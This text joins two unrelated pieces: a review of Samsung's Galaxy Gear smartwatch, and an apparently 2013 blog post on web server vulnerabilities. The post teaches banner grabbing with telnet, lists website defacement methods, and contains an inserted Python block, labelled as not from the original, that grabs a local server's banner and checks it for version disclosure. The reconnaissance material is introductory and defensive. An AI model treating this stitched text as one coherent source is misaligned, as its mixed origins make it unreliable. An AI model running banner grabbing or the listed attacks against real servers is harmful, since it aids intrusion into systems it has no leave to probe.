Out of the box, the Gear can alert you when you get a new email, calendar appointment, text, or phone call. You can answer incoming calls without pulling your phone out thanks to a built-in speaker and microphone on the wristband. You can also make calls either by typing in the number manually or using Samsung's virtual assistant called S Voice to tell the device to dial with a command like, "call Laura."



There are a slew of other basic features:

An internal motion sensor switches the screen on when you raise your wrist so you can get a quick glance at the time and weather.
There's a pedometer for tracking your steps. It syncs with Samsung's S Health app on the Note 3 to help monitor your progress.
You can bypass the passcode on your phone's lock screen if the Galaxy Gear is within range of the Note 3.
Samsung has a special store on the Note 3 where you can download apps to the Galaxy Gear, but the selection is limited. (More on that later.)
You can snap photos with a camera implanted in the wristband and beam them to the Note 3's photo gallery.
If you get a notification on the Galaxy Gear, simply picking up your phone will automatically launch the app you need.
Using It

The Galaxy Gear does its job well when it comes to incoming texts and phone calls. It's really nice to be able to glance at your wrist, see who's calling, and start chatting away without having to dig for your phone. I can also see it being a good hands-free alternative to a speaker phone system in a car, one that's always with you. I also enjoyed how the Gear detects when you lift your wrist, so you can quickly glance at the time and weather conditions.

But notifications for just about everything else don't work as well. The Gear doesn't have a lot of third-party app support, so you can't use it with popular services like Twitter, Facebook, Gmail, Instagram, etc. Samsung did add in a workaround for some services like Gmail and Twitter, but you only get a notification that you have a new item. You're still prompted to look at your phone to read a new Gmail message or tweet. And that completely defeats the purpose of what a smart watch is supposed to do. It's hard to justify using the Gear when it just makes you pull out your phone for most stuff anyway.

As far as apps go, the selection is pretty dim. Right now you can get Snapchat, Path, Evernote, and a few other apps you've probably never heard of. But those apps aren't that great. I had a lot of trouble getting Evernote to sync with the Note 3, and it's pretty awkward to shoot a Snapchat photo from your wrist. Path, a mobile-only social network, probably has the best Gear app right now, but only because it makes it really easy to check into a venue like you would on Foursquare. Other than that, you're pretty limited by the small screen.

[Image: Steve Kovach/Business Insider] Some apps on the Galaxy Gear.

The camera is a bit awkward to use too. It sits on the side of the wristband, perpendicular to the screen, which makes it hard to see what you're about to snap. Once you do take a photo, you can beam it back to your Note 3 over Bluetooth. Samsung says the Gear's camera isn't designed to replace your regular smartphone camera. Instead, it's a way to help you scan real-world items like barcodes or QR codes. Unfortunately, there aren't any apps that can do that with the Gear, and even if there were, you'd likely never use them.




I also had a lot of trouble with Samsung's voice assistant S Voice. In theory, S Voice lets you dictate a command into the Gear to make a call, send a text, check the weather, etc. But it was incredibly slow for me. In many cases, by the time S Voice was able to register my command I could've just done the task myself by pulling out the smartphone.

(Again, that defeats the purpose of having a smart watch. The point is to keep your phone tucked away.)
Design And Hardware

I usually criticize Samsung's products for being built with cheap-feeling plastic, but the Gear is different. This is the first mobile device I've used from the company that feels sturdy and well built. It's made mostly from metal, and the band is a durable plastic that fits comfortably around your wrist. I tested the black version, which is pretty inconspicuous, but the Gear also comes in several other eye-catching colors like orange or yellow.

[Image: Steve Kovach/Business Insider]

It's not that attractive though. The Gear is a lot thicker and heavier than I had expected, and has an odd industrial look on its face thanks to the four visible screws in each corner. It's essentially just a shrunken down smartphone, making it feel chunky and awkward on your wrist. The Gear is hardly the fashion statement Samsung execs made it out to be when the device was first introduced.


Conclusion


The Galaxy Gear is so limited that I can't even justify an excuse like, "well, it's just a first-generation product that will get better in time." The Gear feels more like an unfinished product, something Samsung rushed out just so it could be first to market.

The saying "measure twice, cut once" doesn't apply here. It seems like Samsung didn't even measure before rushing the Gear out the door. This is one product I don't think anyone should buy, at least until Samsung is able to add more features and convince other app developers to do the same.



Saturday, 5 October 2013

How Web Servers Work

How Web Servers Work and Web Server Vulnerabilities

Web servers use Hypertext Transfer Protocol (HTTP) and Hypertext Transfer Protocol Secure (HTTPS) to allow web-based clients to connect to them and view and download files. HTTP is an Application-layer protocol in the TCP/IP stack. HTTP and HTTPS are the primary protocols used by web clients accessing web pages residing on web servers on the Internet. Hypertext Markup Language (HTML) is the language used to create web pages and allows those pages to be rendered in web browser software on web clients.

The HTTP protocol operates as shown below:

1. The web client initially opens a connection to the web server IP address using TCP port 80.
2. The web server waits for a GET request from the client requesting the home page for the website.
3. The web server responds with the HTML code for the web server home page.
4. The client processes the HTML code and the web client's browser software renders the page on the client device.

Types of Web Server Vulnerabilities


Web servers, like other systems, can be compromised by a hacker. The following vulnerabilities are most commonly exploited in web servers:

Misconfiguration of the Web Server Software
A common issue with using Microsoft's Internet Information Server (IIS) as a web server is the use of the default website. The permissions on the default website are open, meaning the default settings leave the site open to attack. For example, all users in the everyone group have full control to all the files in the default website directory. It is critical to edit and restrict permissions once IIS is installed on the server, as the default system user, IUSR_COMPUTERNAME, is a member of the everyone group. Consequently, anyone accessing the default website will be able to access all files in the default website folder and will have dangerous permissions such as Execute and Full Control to the files. See Exercise 8.1 to learn how to disable the default website in IIS.

Operating System or Application Bugs, or Flaws in Programming Code
All programs, including the OS and web server applications, should be patched or updated on a regular basis. For Windows systems, this includes security patches, hotfixes, and Windows Updates. All of these patches can be automated or manually applied to the systems once they have been tested.

Vulnerable Default Installation
Operating system and web server software settings should not be left at their defaults when installed, and should be updated on a continuous basis.

Hackers exploit these vulnerabilities to gain access to the web server. Because web servers are usually located in a demilitarized zone (DMZ)—which is a publicly accessible area between two packet filtering devices and can be easily accessed by the organization's client systems—an exploit of a web server offers a hacker easier access to internal systems or databases.


Attacking a Web Server

Web servers typically listen on TCP port 80 (HTTP) and TCP port 443 (HTTPS). Because
those ports must be open and available to web clients, any firewalls or packet filtering devices
between the web client and web server must pass traffic destined for those ports. Web application
software sits on top of the web server software and allows access to additional ports.
One of the initial information-gathering steps targeting web servers is banner grabbing.
Banner grabbing is an attempt to gather information about a web server such as the OS and
web server software and version. Exercise 8.3 shows you how to use banner grabbing.


Banner Grabbing
1. At the command prompt on your Windows PC, type
telnet <IPaddress> 80
The IP address is the address of the web server target. A hostname (URL) can be used instead of the IP address.
2. Next, in the telnet window type
HEAD / HTTP/1.0
Then press Enter twice (the empty line tells the server that the request is complete).
The web server banner will then be returned. The banner will look something like the following:
Server: Microsoft-IIS/5.0
Date: Fri, 14 Aug 2009 1:14:42 GMT
Content-Length:340
Content-Type: text/html

The banner grabbing result will usually identify the web server type and version. This
information is important because exploits against this web server type and version can be
identified. The next step after banner grabbing would be to attack the web server or attack
a web application and gain access to data on the server.
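The GET exchange in steps 1 to 4 above and the HEAD banner grab from the exercise, carried out end to end as an added example that is not from the original page or its source book: a stand-in web server, a raw-socket client that speaks HTTP/1.0 exactly as the telnet session does, and a defender's check for a Server header that discloses a version. The ExampleServer/1.0 banner, the loopback port and the sample home page are constructed for the demo.

```python
import re
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

HOME_PAGE = b"<html><body><h1>Home page (constructed sample)</h1></body></html>"

class _HomeHandler(BaseHTTPRequestHandler):
    """Stand-in web server (constructed, not a real product) answering GET and HEAD."""
    server_version, sys_version = "ExampleServer/1.0", ""  # constructed banner
    log_message = lambda *args: None  # keep the demo quiet
    def do_HEAD(self):
        self.send_response(200)  # adds the Server and Date banner headers
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(HOME_PAGE)))
        self.end_headers()
    def do_GET(self):
        self.do_HEAD()                # same headers, then the page body (step 3)
        self.wfile.write(HOME_PAGE)

def start_server():
    srv = HTTPServer(("127.0.0.1", 0), _HomeHandler)  # free loopback port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def http_request(host, port, method="GET", path="/"):
    """Step 1: open a TCP connection, send one HTTP/1.0 request, parse the reply."""
    # The empty line ending the request is what a telnet user supplies with a second Enter.
    request = f"{method} {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(request)
        raw = b""
        while chunk := sock.recv(4096):  # HTTP/1.0: the server closes when done
            raw += chunk
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines)}
    return int(status_line.split(" ", 2)[1]), headers, body

def banner_reveals_version(headers):
    """Defender check: does the Server header disclose a version (e.g. 'IIS/5.0')?"""
    return re.search(r"/\d+(\.\d+)*", headers.get("server", "")) is not None

if __name__ == "__main__":
    srv = start_server()
    print(http_request("127.0.0.1", srv.server_address[1], "HEAD")[1])
    srv.shutdown()
```

A Server header stripped down to the product name (or removed) makes banner grabbing return nothing a version-specific exploit search could use.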
A benign but visible type of attack against web servers is defacement. Hackers deface
websites for sheer joy and an opportunity to enhance their reputations rather than gathering
any useful data. Defacing a website means the hacker exploits a vulnerability in the OS or
web server software and then alters the website files to show that the site has been hacked.
Often the hacker displays their hacker name on the website’s home page.
Common website attacks that enable a hacker to deface a website include the following:

=> Capturing administrator credentials through man-in-the-middle attacks
=> Revealing an administrator password through a brute-force attack
=> Using a DNS attack to redirect users to a different web server
=> Compromising an FTP or email server
=> Exploiting web application bugs that result in a vulnerability
=> Misconfiguring web shares
=> Taking advantage of weak permissions
=> Rerouting a client after a firewall or router attack
=> Using SQL injection attacks (if the SQL server and web server are the same system)
=> Using telnet or Secure Shell (SSH) intrusion
=> Carrying out URL poisoning, which redirects the user to a different URL
=> Using web server extension or remote service intrusion
=> Intercepting the communication between the client and the server and changing the cookie to make the server believe that there is a user with higher privileges (applies to cookie-enabled security)


For educational purposes.